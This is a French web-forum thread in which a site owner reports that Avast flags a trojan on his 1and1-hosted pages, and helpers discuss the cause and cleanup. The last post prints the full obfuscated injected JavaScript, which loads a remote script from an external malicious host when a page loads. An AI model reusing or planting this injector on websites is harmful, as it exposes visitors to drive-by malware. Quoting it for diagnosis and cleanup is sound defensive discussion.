Discussion :

[vincenautili]

Bonjour à tous,

Voilà dès que j'essaies de me rendre à l'adresse de mon site, avast me bloque et l'affichage de la page s'arrête, avast me signale un cheval de troie !

Et ce code s'est ajouté comme par magie sur ma page d'index, je l'ai supprimé mais le problème persiste sur les autres pages (alors qu'elles ne contiennent pas le code en question...).

Cela commence par :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<script>/*GNU GPL*/ try{window.onload = function(){var I5iv62m4chn = ...

Si vous pouviez m'aider à résoudre mon problème ce serai super !

Je suis sous 1and1, mutualisé, Linux, mon FTP c'est un gros bordel, par panique j'ai supprimé les pages concernées, j'aurais pas du peut être, et j'espère que ça touche pas l'ensemble du serveur...

Merci

PS : Tout mon hébergement est touché je viens de voir, tous les dossiers...

Que dois je faire ?

Le serveur de 1and1 est peut être aussi touché, vont me tuer lol

[Invité]

Bonjour,
d'aprés le code facile a suivre, cela ne peut venir du serveur mais d'une faille chez toi !
il faudrait controler tout les mod de protection de tout tes fichiers
c'est trés vite vu avec FTP,
755 pour les répertoires
644 pour les fichiers que ce soient des images des PHP des CSS des JS etc ...

Supprimes pour le moment tout controle de POST GET FILES SESSION etc...

fait déjas tourné ton site ainsi !

( je supposes que tu as tout "propre" en local)

Tiens nous au courant, et si tu acceptes mets moi ton URL par Message Privé.

[vincenautili]

Merci mais j'ai tout supprimé, base de donnée + vider le FTP. J'ai tout en local donc je vais analyser tranquillement mes controles de sécurité.

J'espère surtout que je m'en suis bien débarassé au niveau de ma BDD et de mon hébergement

Merci des conseils.

Personne est capable de savoir ce qu'est ce code JavaScript... ?

Merci

[bleubykey]

http://www.developpez.net/forums/d86...umblar-retour/

[Invité]

http://www.developpez.net/forums/d86...umblar-retour/

Pas vraiment et sagissant de la génération dans le temp du user d'un fichier
trojan , je ne peux c'est normal l'expliquer ici ceux qui connaissent verront mieux ainsi

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16


<script>/*GNU GPL*/ try
{window.onload = function()
 {
var x = document.createElement('s)c^r@i#@p#^&)@t(('.replace(/\!|\^|\)|@|&|#|\$|\(/ig, ''));
x.setAttribute('type', 'text/javascript');
x.setAttribute('src', 'h&(t^$(t(&p^$$:&^$(/$@(^/@&!h)((u##$d!(^o&@n#!)g@#-&)c^$o@$m!().!v&a$^$g&&o$)s$^&&(.)(e&$s^@)@.^^)#n($&y@(p($#o#^s^^(t(-^!c@!o!#$m)^.))^w(i@!n(t!&$e($)#r&))s@a^&l@#e)#o^@!!@n^)$l#i$#(n@e!!&.#r$^^)$u)&:#!8$^#)0^8)0&/(($g!(o@@&(o&g$@&l^(e#$^.@!c($@o))m#$^/((g)(&)(o(&^o@^#g@)^l#e#)!.##c#)$@o&$$^m)#/$!#b^a$^(#h&@(n!!.(@d!)$(e!()$/&#^5^!!^8#!.$@c^(o&)^@&m@$/)t)w!&^$i)!^)t)@!t&(@e!!!$r^!&.&!c@o^^&m&)^/(&'.replace(/\$|&|\(|#|\)|@|\!|\^/ig, ''));
x.setAttribute('defer', 'defer');
x.setAttribute('id', 'W&(t^(4))$x!$$l(#@$w^j@)#x!c&@#m)i)!u('.replace(/\^|\)|@|#|\$|&|\!|\(/ig, ''));
document.body.appendChild(x);
 }
}
catch(e) {}
</script>